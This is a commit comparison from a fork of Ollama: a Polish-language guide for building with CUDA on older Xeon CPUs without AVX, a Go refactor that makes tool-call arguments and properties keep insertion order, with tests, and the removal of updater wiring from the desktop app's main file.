Compare commits
7 Commits
hoyyeva/up
...
main
| Author | SHA1 | Date |
|---|---|---|
|
|
5f179ff937 | |
|
|
f9abca6321 | |
|
|
a5710c4c07 | |
|
|
f8ba6e1946 | |
|
|
76912c062a | |
|
|
6c3faafed2 | |
|
|
e51dead636 |
|
|
@ -0,0 +1,38 @@
|
||||||
|
# Instrukcja budowania dla Intel Xeon (bez AVX) + NVIDIA GPU (MX Linux)
|
||||||
|
|
||||||
|
Ten build naprawia błąd `Illegal instruction` na starszych procesorach i wymusza użycie CUDA.
|
||||||
|
|
||||||
|
## Wymagania
|
||||||
|
* Zainstalowane `cuda-toolkit` (bez sterowników, jeśli już są w systemie).
|
||||||
|
* Pobrane repozytorium z `git submodule update --init --recursive`.
|
||||||
|
|
||||||
|
## 1. Symlinki (Naprawa ścieżek MX Linux)
|
||||||
|
MX Linux trzyma CUDA w niestandardowym miejscu. Wykonaj raz:
|
||||||
|
```bash
|
||||||
|
sudo mkdir -p /usr/local/cuda
|
||||||
|
sudo ln -sFn /usr/lib/cuda/include /usr/local/cuda/include
|
||||||
|
sudo ln -sFn /usr/lib/x86_64-linux-gnu/nvidia/current /usr/local/cuda/lib64
|
||||||
|
```
|
||||||
|
|
||||||
|
```bash
|
||||||
|
# Wyczyść stare
|
||||||
|
rm -rf build
|
||||||
|
|
||||||
|
# Konfiguracja
|
||||||
|
cmake -B build \
|
||||||
|
-DOLLAMA_CUDA=ON \
|
||||||
|
-DOLLAMA_VULKAN=OFF \
|
||||||
|
-DGGML_VULKAN=OFF \
|
||||||
|
-DCMAKE_DISABLE_FIND_PACKAGE_Vulkan=TRUE
|
||||||
|
|
||||||
|
# Kompilacja (1 wątek dla stabilności przy OC)
|
||||||
|
cmake --build build -j1
|
||||||
|
|
||||||
|
# Zbudowanie pliku wykonywalnego
|
||||||
|
go build .
|
||||||
|
```
|
||||||
|
|
||||||
|
```bash
|
||||||
|
sudo mv ollama /usr/bin/ollama
|
||||||
|
sudo chmod +x /usr/bin/ollama
|
||||||
|
```
|
||||||
|
|
@ -6,6 +6,9 @@
|
||||||
|
|
||||||
# Ollama
|
# Ollama
|
||||||
|
|
||||||
|
W przypadku xeon 5675 przeczytaj plik NO_AVX_GUIDE.md!!
|
||||||
|
Możesz zastosować też build_custom.sh dla automatycznego FIX
|
||||||
|
|
||||||
Get up and running with large language models.
|
Get up and running with large language models.
|
||||||
|
|
||||||
### macOS
|
### macOS
|
||||||
|
|
|
||||||
159
api/types.go
159
api/types.go
|
|
@ -3,6 +3,7 @@ package api
|
||||||
import (
|
import (
|
||||||
"encoding/json"
|
"encoding/json"
|
||||||
"fmt"
|
"fmt"
|
||||||
|
"iter"
|
||||||
"log/slog"
|
"log/slog"
|
||||||
"math"
|
"math"
|
||||||
"os"
|
"os"
|
||||||
|
|
@ -14,6 +15,7 @@ import (
|
||||||
"github.com/google/uuid"
|
"github.com/google/uuid"
|
||||||
|
|
||||||
"github.com/ollama/ollama/envconfig"
|
"github.com/ollama/ollama/envconfig"
|
||||||
|
"github.com/ollama/ollama/internal/orderedmap"
|
||||||
"github.com/ollama/ollama/types/model"
|
"github.com/ollama/ollama/types/model"
|
||||||
)
|
)
|
||||||
|
|
||||||
|
|
@ -227,13 +229,79 @@ type ToolCallFunction struct {
|
||||||
Arguments ToolCallFunctionArguments `json:"arguments"`
|
Arguments ToolCallFunctionArguments `json:"arguments"`
|
||||||
}
|
}
|
||||||
|
|
||||||
type ToolCallFunctionArguments map[string]any
|
// ToolCallFunctionArguments holds tool call arguments in insertion order.
|
||||||
|
type ToolCallFunctionArguments struct {
|
||||||
|
om *orderedmap.Map[string, any]
|
||||||
|
}
|
||||||
|
|
||||||
|
// NewToolCallFunctionArguments creates a new empty ToolCallFunctionArguments.
|
||||||
|
func NewToolCallFunctionArguments() ToolCallFunctionArguments {
|
||||||
|
return ToolCallFunctionArguments{om: orderedmap.New[string, any]()}
|
||||||
|
}
|
||||||
|
|
||||||
|
// Get retrieves a value by key.
|
||||||
|
func (t *ToolCallFunctionArguments) Get(key string) (any, bool) {
|
||||||
|
if t == nil || t.om == nil {
|
||||||
|
return nil, false
|
||||||
|
}
|
||||||
|
return t.om.Get(key)
|
||||||
|
}
|
||||||
|
|
||||||
|
// Set sets a key-value pair, preserving insertion order.
|
||||||
|
func (t *ToolCallFunctionArguments) Set(key string, value any) {
|
||||||
|
if t == nil {
|
||||||
|
return
|
||||||
|
}
|
||||||
|
if t.om == nil {
|
||||||
|
t.om = orderedmap.New[string, any]()
|
||||||
|
}
|
||||||
|
t.om.Set(key, value)
|
||||||
|
}
|
||||||
|
|
||||||
|
// Len returns the number of arguments.
|
||||||
|
func (t *ToolCallFunctionArguments) Len() int {
|
||||||
|
if t == nil || t.om == nil {
|
||||||
|
return 0
|
||||||
|
}
|
||||||
|
return t.om.Len()
|
||||||
|
}
|
||||||
|
|
||||||
|
// All returns an iterator over all key-value pairs in insertion order.
|
||||||
|
func (t *ToolCallFunctionArguments) All() iter.Seq2[string, any] {
|
||||||
|
if t == nil || t.om == nil {
|
||||||
|
return func(yield func(string, any) bool) {}
|
||||||
|
}
|
||||||
|
return t.om.All()
|
||||||
|
}
|
||||||
|
|
||||||
|
// ToMap returns a regular map (order not preserved).
|
||||||
|
func (t *ToolCallFunctionArguments) ToMap() map[string]any {
|
||||||
|
if t == nil || t.om == nil {
|
||||||
|
return nil
|
||||||
|
}
|
||||||
|
return t.om.ToMap()
|
||||||
|
}
|
||||||
|
|
||||||
func (t *ToolCallFunctionArguments) String() string {
|
func (t *ToolCallFunctionArguments) String() string {
|
||||||
bts, _ := json.Marshal(t)
|
if t == nil || t.om == nil {
|
||||||
|
return "{}"
|
||||||
|
}
|
||||||
|
bts, _ := json.Marshal(t.om)
|
||||||
return string(bts)
|
return string(bts)
|
||||||
}
|
}
|
||||||
|
|
||||||
|
func (t *ToolCallFunctionArguments) UnmarshalJSON(data []byte) error {
|
||||||
|
t.om = orderedmap.New[string, any]()
|
||||||
|
return json.Unmarshal(data, t.om)
|
||||||
|
}
|
||||||
|
|
||||||
|
func (t ToolCallFunctionArguments) MarshalJSON() ([]byte, error) {
|
||||||
|
if t.om == nil {
|
||||||
|
return []byte("{}"), nil
|
||||||
|
}
|
||||||
|
return json.Marshal(t.om)
|
||||||
|
}
|
||||||
|
|
||||||
type Tool struct {
|
type Tool struct {
|
||||||
Type string `json:"type"`
|
Type string `json:"type"`
|
||||||
Items any `json:"items,omitempty"`
|
Items any `json:"items,omitempty"`
|
||||||
|
|
@ -282,13 +350,78 @@ func (pt PropertyType) String() string {
|
||||||
return fmt.Sprintf("%v", []string(pt))
|
return fmt.Sprintf("%v", []string(pt))
|
||||||
}
|
}
|
||||||
|
|
||||||
|
// ToolPropertiesMap holds tool properties in insertion order.
|
||||||
|
type ToolPropertiesMap struct {
|
||||||
|
om *orderedmap.Map[string, ToolProperty]
|
||||||
|
}
|
||||||
|
|
||||||
|
// NewToolPropertiesMap creates a new empty ToolPropertiesMap.
|
||||||
|
func NewToolPropertiesMap() *ToolPropertiesMap {
|
||||||
|
return &ToolPropertiesMap{om: orderedmap.New[string, ToolProperty]()}
|
||||||
|
}
|
||||||
|
|
||||||
|
// Get retrieves a property by name.
|
||||||
|
func (t *ToolPropertiesMap) Get(key string) (ToolProperty, bool) {
|
||||||
|
if t == nil || t.om == nil {
|
||||||
|
return ToolProperty{}, false
|
||||||
|
}
|
||||||
|
return t.om.Get(key)
|
||||||
|
}
|
||||||
|
|
||||||
|
// Set sets a property, preserving insertion order.
|
||||||
|
func (t *ToolPropertiesMap) Set(key string, value ToolProperty) {
|
||||||
|
if t == nil {
|
||||||
|
return
|
||||||
|
}
|
||||||
|
if t.om == nil {
|
||||||
|
t.om = orderedmap.New[string, ToolProperty]()
|
||||||
|
}
|
||||||
|
t.om.Set(key, value)
|
||||||
|
}
|
||||||
|
|
||||||
|
// Len returns the number of properties.
|
||||||
|
func (t *ToolPropertiesMap) Len() int {
|
||||||
|
if t == nil || t.om == nil {
|
||||||
|
return 0
|
||||||
|
}
|
||||||
|
return t.om.Len()
|
||||||
|
}
|
||||||
|
|
||||||
|
// All returns an iterator over all properties in insertion order.
|
||||||
|
func (t *ToolPropertiesMap) All() iter.Seq2[string, ToolProperty] {
|
||||||
|
if t == nil || t.om == nil {
|
||||||
|
return func(yield func(string, ToolProperty) bool) {}
|
||||||
|
}
|
||||||
|
return t.om.All()
|
||||||
|
}
|
||||||
|
|
||||||
|
// ToMap returns a regular map (order not preserved).
|
||||||
|
func (t *ToolPropertiesMap) ToMap() map[string]ToolProperty {
|
||||||
|
if t == nil || t.om == nil {
|
||||||
|
return nil
|
||||||
|
}
|
||||||
|
return t.om.ToMap()
|
||||||
|
}
|
||||||
|
|
||||||
|
func (t ToolPropertiesMap) MarshalJSON() ([]byte, error) {
|
||||||
|
if t.om == nil {
|
||||||
|
return []byte("null"), nil
|
||||||
|
}
|
||||||
|
return json.Marshal(t.om)
|
||||||
|
}
|
||||||
|
|
||||||
|
func (t *ToolPropertiesMap) UnmarshalJSON(data []byte) error {
|
||||||
|
t.om = orderedmap.New[string, ToolProperty]()
|
||||||
|
return json.Unmarshal(data, t.om)
|
||||||
|
}
|
||||||
|
|
||||||
type ToolProperty struct {
|
type ToolProperty struct {
|
||||||
AnyOf []ToolProperty `json:"anyOf,omitempty"`
|
AnyOf []ToolProperty `json:"anyOf,omitempty"`
|
||||||
Type PropertyType `json:"type,omitempty"`
|
Type PropertyType `json:"type,omitempty"`
|
||||||
Items any `json:"items,omitempty"`
|
Items any `json:"items,omitempty"`
|
||||||
Description string `json:"description,omitempty"`
|
Description string `json:"description,omitempty"`
|
||||||
Enum []any `json:"enum,omitempty"`
|
Enum []any `json:"enum,omitempty"`
|
||||||
Properties map[string]ToolProperty `json:"properties,omitempty"`
|
Properties *ToolPropertiesMap `json:"properties,omitempty"`
|
||||||
}
|
}
|
||||||
|
|
||||||
// ToTypeScriptType converts a ToolProperty to a TypeScript type string
|
// ToTypeScriptType converts a ToolProperty to a TypeScript type string
|
||||||
|
|
@ -337,11 +470,11 @@ func mapToTypeScriptType(jsonType string) string {
|
||||||
}
|
}
|
||||||
|
|
||||||
type ToolFunctionParameters struct {
|
type ToolFunctionParameters struct {
|
||||||
Type string `json:"type"`
|
Type string `json:"type"`
|
||||||
Defs any `json:"$defs,omitempty"`
|
Defs any `json:"$defs,omitempty"`
|
||||||
Items any `json:"items,omitempty"`
|
Items any `json:"items,omitempty"`
|
||||||
Required []string `json:"required,omitempty"`
|
Required []string `json:"required,omitempty"`
|
||||||
Properties map[string]ToolProperty `json:"properties"`
|
Properties *ToolPropertiesMap `json:"properties"`
|
||||||
}
|
}
|
||||||
|
|
||||||
func (t *ToolFunctionParameters) String() string {
|
func (t *ToolFunctionParameters) String() string {
|
||||||
|
|
|
||||||
|
|
@ -11,6 +11,24 @@ import (
|
||||||
"github.com/stretchr/testify/require"
|
"github.com/stretchr/testify/require"
|
||||||
)
|
)
|
||||||
|
|
||||||
|
// testPropsMap creates a ToolPropertiesMap from a map (convenience function for tests, order not preserved)
|
||||||
|
func testPropsMap(m map[string]ToolProperty) *ToolPropertiesMap {
|
||||||
|
props := NewToolPropertiesMap()
|
||||||
|
for k, v := range m {
|
||||||
|
props.Set(k, v)
|
||||||
|
}
|
||||||
|
return props
|
||||||
|
}
|
||||||
|
|
||||||
|
// testArgs creates ToolCallFunctionArguments from a map (convenience function for tests, order not preserved)
|
||||||
|
func testArgs(m map[string]any) ToolCallFunctionArguments {
|
||||||
|
args := NewToolCallFunctionArguments()
|
||||||
|
for k, v := range m {
|
||||||
|
args.Set(k, v)
|
||||||
|
}
|
||||||
|
return args
|
||||||
|
}
|
||||||
|
|
||||||
func TestKeepAliveParsingFromJSON(t *testing.T) {
|
func TestKeepAliveParsingFromJSON(t *testing.T) {
|
||||||
tests := []struct {
|
tests := []struct {
|
||||||
name string
|
name string
|
||||||
|
|
@ -309,9 +327,9 @@ func TestToolFunctionParameters_MarshalJSON(t *testing.T) {
|
||||||
input: ToolFunctionParameters{
|
input: ToolFunctionParameters{
|
||||||
Type: "object",
|
Type: "object",
|
||||||
Required: []string{"name"},
|
Required: []string{"name"},
|
||||||
Properties: map[string]ToolProperty{
|
Properties: testPropsMap(map[string]ToolProperty{
|
||||||
"name": {Type: PropertyType{"string"}},
|
"name": {Type: PropertyType{"string"}},
|
||||||
},
|
}),
|
||||||
},
|
},
|
||||||
expected: `{"type":"object","required":["name"],"properties":{"name":{"type":"string"}}}`,
|
expected: `{"type":"object","required":["name"],"properties":{"name":{"type":"string"}}}`,
|
||||||
},
|
},
|
||||||
|
|
@ -319,9 +337,9 @@ func TestToolFunctionParameters_MarshalJSON(t *testing.T) {
|
||||||
name: "no required",
|
name: "no required",
|
||||||
input: ToolFunctionParameters{
|
input: ToolFunctionParameters{
|
||||||
Type: "object",
|
Type: "object",
|
||||||
Properties: map[string]ToolProperty{
|
Properties: testPropsMap(map[string]ToolProperty{
|
||||||
"name": {Type: PropertyType{"string"}},
|
"name": {Type: PropertyType{"string"}},
|
||||||
},
|
}),
|
||||||
},
|
},
|
||||||
expected: `{"type":"object","properties":{"name":{"type":"string"}}}`,
|
expected: `{"type":"object","properties":{"name":{"type":"string"}}}`,
|
||||||
},
|
},
|
||||||
|
|
@ -339,7 +357,7 @@ func TestToolFunctionParameters_MarshalJSON(t *testing.T) {
|
||||||
func TestToolCallFunction_IndexAlwaysMarshals(t *testing.T) {
|
func TestToolCallFunction_IndexAlwaysMarshals(t *testing.T) {
|
||||||
fn := ToolCallFunction{
|
fn := ToolCallFunction{
|
||||||
Name: "echo",
|
Name: "echo",
|
||||||
Arguments: ToolCallFunctionArguments{"message": "hi"},
|
Arguments: testArgs(map[string]any{"message": "hi"}),
|
||||||
}
|
}
|
||||||
|
|
||||||
data, err := json.Marshal(fn)
|
data, err := json.Marshal(fn)
|
||||||
|
|
@ -529,7 +547,7 @@ func TestToolPropertyNestedProperties(t *testing.T) {
|
||||||
expected: ToolProperty{
|
expected: ToolProperty{
|
||||||
Type: PropertyType{"object"},
|
Type: PropertyType{"object"},
|
||||||
Description: "Location details",
|
Description: "Location details",
|
||||||
Properties: map[string]ToolProperty{
|
Properties: testPropsMap(map[string]ToolProperty{
|
||||||
"address": {
|
"address": {
|
||||||
Type: PropertyType{"string"},
|
Type: PropertyType{"string"},
|
||||||
Description: "Street address",
|
Description: "Street address",
|
||||||
|
|
@ -538,7 +556,7 @@ func TestToolPropertyNestedProperties(t *testing.T) {
|
||||||
Type: PropertyType{"string"},
|
Type: PropertyType{"string"},
|
||||||
Description: "City name",
|
Description: "City name",
|
||||||
},
|
},
|
||||||
},
|
}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
{
|
{
|
||||||
|
|
@ -566,22 +584,22 @@ func TestToolPropertyNestedProperties(t *testing.T) {
|
||||||
expected: ToolProperty{
|
expected: ToolProperty{
|
||||||
Type: PropertyType{"object"},
|
Type: PropertyType{"object"},
|
||||||
Description: "Event",
|
Description: "Event",
|
||||||
Properties: map[string]ToolProperty{
|
Properties: testPropsMap(map[string]ToolProperty{
|
||||||
"location": {
|
"location": {
|
||||||
Type: PropertyType{"object"},
|
Type: PropertyType{"object"},
|
||||||
Description: "Location",
|
Description: "Location",
|
||||||
Properties: map[string]ToolProperty{
|
Properties: testPropsMap(map[string]ToolProperty{
|
||||||
"coordinates": {
|
"coordinates": {
|
||||||
Type: PropertyType{"object"},
|
Type: PropertyType{"object"},
|
||||||
Description: "GPS coordinates",
|
Description: "GPS coordinates",
|
||||||
Properties: map[string]ToolProperty{
|
Properties: testPropsMap(map[string]ToolProperty{
|
||||||
"lat": {Type: PropertyType{"number"}, Description: "Latitude"},
|
"lat": {Type: PropertyType{"number"}, Description: "Latitude"},
|
||||||
"lng": {Type: PropertyType{"number"}, Description: "Longitude"},
|
"lng": {Type: PropertyType{"number"}, Description: "Longitude"},
|
||||||
},
|
}),
|
||||||
},
|
},
|
||||||
},
|
}),
|
||||||
},
|
},
|
||||||
},
|
}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
}
|
}
|
||||||
|
|
@ -591,7 +609,13 @@ func TestToolPropertyNestedProperties(t *testing.T) {
|
||||||
var prop ToolProperty
|
var prop ToolProperty
|
||||||
err := json.Unmarshal([]byte(tt.input), &prop)
|
err := json.Unmarshal([]byte(tt.input), &prop)
|
||||||
require.NoError(t, err)
|
require.NoError(t, err)
|
||||||
assert.Equal(t, tt.expected, prop)
|
|
||||||
|
// Compare JSON representations since pointer comparison doesn't work
|
||||||
|
expectedJSON, err := json.Marshal(tt.expected)
|
||||||
|
require.NoError(t, err)
|
||||||
|
actualJSON, err := json.Marshal(prop)
|
||||||
|
require.NoError(t, err)
|
||||||
|
assert.JSONEq(t, string(expectedJSON), string(actualJSON))
|
||||||
|
|
||||||
// Round-trip test: marshal and unmarshal again
|
// Round-trip test: marshal and unmarshal again
|
||||||
data, err := json.Marshal(prop)
|
data, err := json.Marshal(prop)
|
||||||
|
|
@ -600,7 +624,10 @@ func TestToolPropertyNestedProperties(t *testing.T) {
|
||||||
var prop2 ToolProperty
|
var prop2 ToolProperty
|
||||||
err = json.Unmarshal(data, &prop2)
|
err = json.Unmarshal(data, &prop2)
|
||||||
require.NoError(t, err)
|
require.NoError(t, err)
|
||||||
assert.Equal(t, tt.expected, prop2)
|
|
||||||
|
prop2JSON, err := json.Marshal(prop2)
|
||||||
|
require.NoError(t, err)
|
||||||
|
assert.JSONEq(t, string(expectedJSON), string(prop2JSON))
|
||||||
})
|
})
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
@ -616,12 +643,12 @@ func TestToolFunctionParameters_String(t *testing.T) {
|
||||||
params: ToolFunctionParameters{
|
params: ToolFunctionParameters{
|
||||||
Type: "object",
|
Type: "object",
|
||||||
Required: []string{"name"},
|
Required: []string{"name"},
|
||||||
Properties: map[string]ToolProperty{
|
Properties: testPropsMap(map[string]ToolProperty{
|
||||||
"name": {
|
"name": {
|
||||||
Type: PropertyType{"string"},
|
Type: PropertyType{"string"},
|
||||||
Description: "The name of the person",
|
Description: "The name of the person",
|
||||||
},
|
},
|
||||||
},
|
}),
|
||||||
},
|
},
|
||||||
expected: `{"type":"object","required":["name"],"properties":{"name":{"type":"string","description":"The name of the person"}}}`,
|
expected: `{"type":"object","required":["name"],"properties":{"name":{"type":"string","description":"The name of the person"}}}`,
|
||||||
},
|
},
|
||||||
|
|
@ -638,7 +665,7 @@ func TestToolFunctionParameters_String(t *testing.T) {
|
||||||
s.Self = s
|
s.Self = s
|
||||||
return s
|
return s
|
||||||
}(),
|
}(),
|
||||||
Properties: map[string]ToolProperty{},
|
Properties: testPropsMap(map[string]ToolProperty{}),
|
||||||
},
|
},
|
||||||
expected: "",
|
expected: "",
|
||||||
},
|
},
|
||||||
|
|
@ -651,3 +678,235 @@ func TestToolFunctionParameters_String(t *testing.T) {
|
||||||
})
|
})
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
|
func TestToolCallFunctionArguments_OrderPreservation(t *testing.T) {
|
||||||
|
t.Run("marshal preserves insertion order", func(t *testing.T) {
|
||||||
|
args := NewToolCallFunctionArguments()
|
||||||
|
args.Set("zebra", "z")
|
||||||
|
args.Set("apple", "a")
|
||||||
|
args.Set("mango", "m")
|
||||||
|
|
||||||
|
data, err := json.Marshal(args)
|
||||||
|
require.NoError(t, err)
|
||||||
|
|
||||||
|
// Should preserve insertion order, not alphabetical
|
||||||
|
assert.Equal(t, `{"zebra":"z","apple":"a","mango":"m"}`, string(data))
|
||||||
|
})
|
||||||
|
|
||||||
|
t.Run("unmarshal preserves JSON order", func(t *testing.T) {
|
||||||
|
jsonData := `{"zebra":"z","apple":"a","mango":"m"}`
|
||||||
|
|
||||||
|
var args ToolCallFunctionArguments
|
||||||
|
err := json.Unmarshal([]byte(jsonData), &args)
|
||||||
|
require.NoError(t, err)
|
||||||
|
|
||||||
|
// Verify iteration order matches JSON order
|
||||||
|
var keys []string
|
||||||
|
for k := range args.All() {
|
||||||
|
keys = append(keys, k)
|
||||||
|
}
|
||||||
|
assert.Equal(t, []string{"zebra", "apple", "mango"}, keys)
|
||||||
|
})
|
||||||
|
|
||||||
|
t.Run("round trip preserves order", func(t *testing.T) {
|
||||||
|
original := `{"z":1,"a":2,"m":3,"b":4}`
|
||||||
|
|
||||||
|
var args ToolCallFunctionArguments
|
||||||
|
err := json.Unmarshal([]byte(original), &args)
|
||||||
|
require.NoError(t, err)
|
||||||
|
|
||||||
|
data, err := json.Marshal(args)
|
||||||
|
require.NoError(t, err)
|
||||||
|
|
||||||
|
assert.Equal(t, original, string(data))
|
||||||
|
})
|
||||||
|
|
||||||
|
t.Run("String method returns ordered JSON", func(t *testing.T) {
|
||||||
|
args := NewToolCallFunctionArguments()
|
||||||
|
args.Set("c", 3)
|
||||||
|
args.Set("a", 1)
|
||||||
|
args.Set("b", 2)
|
||||||
|
|
||||||
|
assert.Equal(t, `{"c":3,"a":1,"b":2}`, args.String())
|
||||||
|
})
|
||||||
|
|
||||||
|
t.Run("Get retrieves correct values", func(t *testing.T) {
|
||||||
|
args := NewToolCallFunctionArguments()
|
||||||
|
args.Set("key1", "value1")
|
||||||
|
args.Set("key2", 42)
|
||||||
|
|
||||||
|
v, ok := args.Get("key1")
|
||||||
|
assert.True(t, ok)
|
||||||
|
assert.Equal(t, "value1", v)
|
||||||
|
|
||||||
|
v, ok = args.Get("key2")
|
||||||
|
assert.True(t, ok)
|
||||||
|
assert.Equal(t, 42, v)
|
||||||
|
|
||||||
|
_, ok = args.Get("nonexistent")
|
||||||
|
assert.False(t, ok)
|
||||||
|
})
|
||||||
|
|
||||||
|
t.Run("Len returns correct count", func(t *testing.T) {
|
||||||
|
args := NewToolCallFunctionArguments()
|
||||||
|
assert.Equal(t, 0, args.Len())
|
||||||
|
|
||||||
|
args.Set("a", 1)
|
||||||
|
assert.Equal(t, 1, args.Len())
|
||||||
|
|
||||||
|
args.Set("b", 2)
|
||||||
|
assert.Equal(t, 2, args.Len())
|
||||||
|
})
|
||||||
|
|
||||||
|
t.Run("empty args marshal to empty object", func(t *testing.T) {
|
||||||
|
args := NewToolCallFunctionArguments()
|
||||||
|
data, err := json.Marshal(args)
|
||||||
|
require.NoError(t, err)
|
||||||
|
assert.Equal(t, `{}`, string(data))
|
||||||
|
})
|
||||||
|
|
||||||
|
t.Run("zero value args marshal to empty object", func(t *testing.T) {
|
||||||
|
var args ToolCallFunctionArguments
|
||||||
|
assert.Equal(t, "{}", args.String())
|
||||||
|
})
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestToolPropertiesMap_OrderPreservation(t *testing.T) {
|
||||||
|
t.Run("marshal preserves insertion order", func(t *testing.T) {
|
||||||
|
props := NewToolPropertiesMap()
|
||||||
|
props.Set("zebra", ToolProperty{Type: PropertyType{"string"}})
|
||||||
|
props.Set("apple", ToolProperty{Type: PropertyType{"number"}})
|
||||||
|
props.Set("mango", ToolProperty{Type: PropertyType{"boolean"}})
|
||||||
|
|
||||||
|
data, err := json.Marshal(props)
|
||||||
|
require.NoError(t, err)
|
||||||
|
|
||||||
|
// Should preserve insertion order, not alphabetical
|
||||||
|
expected := `{"zebra":{"type":"string"},"apple":{"type":"number"},"mango":{"type":"boolean"}}`
|
||||||
|
assert.Equal(t, expected, string(data))
|
||||||
|
})
|
||||||
|
|
||||||
|
t.Run("unmarshal preserves JSON order", func(t *testing.T) {
|
||||||
|
jsonData := `{"zebra":{"type":"string"},"apple":{"type":"number"},"mango":{"type":"boolean"}}`
|
||||||
|
|
||||||
|
var props ToolPropertiesMap
|
||||||
|
err := json.Unmarshal([]byte(jsonData), &props)
|
||||||
|
require.NoError(t, err)
|
||||||
|
|
||||||
|
// Verify iteration order matches JSON order
|
||||||
|
var keys []string
|
||||||
|
for k := range props.All() {
|
||||||
|
keys = append(keys, k)
|
||||||
|
}
|
||||||
|
assert.Equal(t, []string{"zebra", "apple", "mango"}, keys)
|
||||||
|
})
|
||||||
|
|
||||||
|
t.Run("round trip preserves order", func(t *testing.T) {
|
||||||
|
original := `{"z":{"type":"string"},"a":{"type":"number"},"m":{"type":"boolean"}}`
|
||||||
|
|
||||||
|
var props ToolPropertiesMap
|
||||||
|
err := json.Unmarshal([]byte(original), &props)
|
||||||
|
require.NoError(t, err)
|
||||||
|
|
||||||
|
data, err := json.Marshal(props)
|
||||||
|
require.NoError(t, err)
|
||||||
|
|
||||||
|
assert.Equal(t, original, string(data))
|
||||||
|
})
|
||||||
|
|
||||||
|
t.Run("Get retrieves correct values", func(t *testing.T) {
|
||||||
|
props := NewToolPropertiesMap()
|
||||||
|
props.Set("name", ToolProperty{Type: PropertyType{"string"}, Description: "The name"})
|
||||||
|
props.Set("age", ToolProperty{Type: PropertyType{"integer"}, Description: "The age"})
|
||||||
|
|
||||||
|
v, ok := props.Get("name")
|
||||||
|
assert.True(t, ok)
|
||||||
|
assert.Equal(t, "The name", v.Description)
|
||||||
|
|
||||||
|
v, ok = props.Get("age")
|
||||||
|
assert.True(t, ok)
|
||||||
|
assert.Equal(t, "The age", v.Description)
|
||||||
|
|
||||||
|
_, ok = props.Get("nonexistent")
|
||||||
|
assert.False(t, ok)
|
||||||
|
})
|
||||||
|
|
||||||
|
t.Run("Len returns correct count", func(t *testing.T) {
|
||||||
|
props := NewToolPropertiesMap()
|
||||||
|
assert.Equal(t, 0, props.Len())
|
||||||
|
|
||||||
|
props.Set("a", ToolProperty{})
|
||||||
|
assert.Equal(t, 1, props.Len())
|
||||||
|
|
||||||
|
props.Set("b", ToolProperty{})
|
||||||
|
assert.Equal(t, 2, props.Len())
|
||||||
|
})
|
||||||
|
|
||||||
|
t.Run("nil props marshal to null", func(t *testing.T) {
|
||||||
|
var props *ToolPropertiesMap
|
||||||
|
data, err := json.Marshal(props)
|
||||||
|
require.NoError(t, err)
|
||||||
|
assert.Equal(t, `null`, string(data))
|
||||||
|
})
|
||||||
|
|
||||||
|
t.Run("ToMap returns regular map", func(t *testing.T) {
|
||||||
|
props := NewToolPropertiesMap()
|
||||||
|
props.Set("a", ToolProperty{Type: PropertyType{"string"}})
|
||||||
|
props.Set("b", ToolProperty{Type: PropertyType{"number"}})
|
||||||
|
|
||||||
|
m := props.ToMap()
|
||||||
|
assert.Equal(t, 2, len(m))
|
||||||
|
assert.Equal(t, PropertyType{"string"}, m["a"].Type)
|
||||||
|
assert.Equal(t, PropertyType{"number"}, m["b"].Type)
|
||||||
|
})
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestToolCallFunctionArguments_ComplexValues(t *testing.T) {
|
||||||
|
t.Run("nested objects preserve order", func(t *testing.T) {
|
||||||
|
jsonData := `{"outer":{"z":1,"a":2},"simple":"value"}`
|
||||||
|
|
||||||
|
var args ToolCallFunctionArguments
|
||||||
|
err := json.Unmarshal([]byte(jsonData), &args)
|
||||||
|
require.NoError(t, err)
|
||||||
|
|
||||||
|
// Outer keys should be in order
|
||||||
|
var keys []string
|
||||||
|
for k := range args.All() {
|
||||||
|
keys = append(keys, k)
|
||||||
|
}
|
||||||
|
assert.Equal(t, []string{"outer", "simple"}, keys)
|
||||||
|
})
|
||||||
|
|
||||||
|
t.Run("arrays as values", func(t *testing.T) {
|
||||||
|
args := NewToolCallFunctionArguments()
|
||||||
|
args.Set("items", []string{"a", "b", "c"})
|
||||||
|
args.Set("numbers", []int{1, 2, 3})
|
||||||
|
|
||||||
|
data, err := json.Marshal(args)
|
||||||
|
require.NoError(t, err)
|
||||||
|
|
||||||
|
assert.Equal(t, `{"items":["a","b","c"],"numbers":[1,2,3]}`, string(data))
|
||||||
|
})
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestToolPropertiesMap_NestedProperties(t *testing.T) {
|
||||||
|
t.Run("nested properties preserve order", func(t *testing.T) {
|
||||||
|
props := NewToolPropertiesMap()
|
||||||
|
|
||||||
|
nestedProps := NewToolPropertiesMap()
|
||||||
|
nestedProps.Set("z_field", ToolProperty{Type: PropertyType{"string"}})
|
||||||
|
nestedProps.Set("a_field", ToolProperty{Type: PropertyType{"number"}})
|
||||||
|
|
||||||
|
props.Set("outer", ToolProperty{
|
||||||
|
Type: PropertyType{"object"},
|
||||||
|
Properties: nestedProps,
|
||||||
|
})
|
||||||
|
|
||||||
|
data, err := json.Marshal(props)
|
||||||
|
require.NoError(t, err)
|
||||||
|
|
||||||
|
// Both outer and inner should preserve order
|
||||||
|
expected := `{"outer":{"type":"object","properties":{"z_field":{"type":"string"},"a_field":{"type":"number"}}}}`
|
||||||
|
assert.Equal(t, expected, string(data))
|
||||||
|
})
|
||||||
|
}
|
||||||
|
|
|
||||||
|
|
@ -253,8 +253,6 @@ func main() {
|
||||||
done <- osrv.Run(octx)
|
done <- osrv.Run(octx)
|
||||||
}()
|
}()
|
||||||
|
|
||||||
upd := &updater.Updater{Store: st}
|
|
||||||
|
|
||||||
uiServer := ui.Server{
|
uiServer := ui.Server{
|
||||||
Token: token,
|
Token: token,
|
||||||
Restart: func() {
|
Restart: func() {
|
||||||
|
|
@ -269,10 +267,6 @@ func main() {
|
||||||
ToolRegistry: toolRegistry,
|
ToolRegistry: toolRegistry,
|
||||||
Dev: devMode,
|
Dev: devMode,
|
||||||
Logger: slog.Default(),
|
Logger: slog.Default(),
|
||||||
Updater: upd,
|
|
||||||
UpdateAvailableFunc: func() {
|
|
||||||
UpdateAvailable("")
|
|
||||||
},
|
|
||||||
}
|
}
|
||||||
|
|
||||||
srv := &http.Server{
|
srv := &http.Server{
|
||||||
|
|
@ -290,13 +284,8 @@ func main() {
|
||||||
slog.Debug("background desktop server done")
|
slog.Debug("background desktop server done")
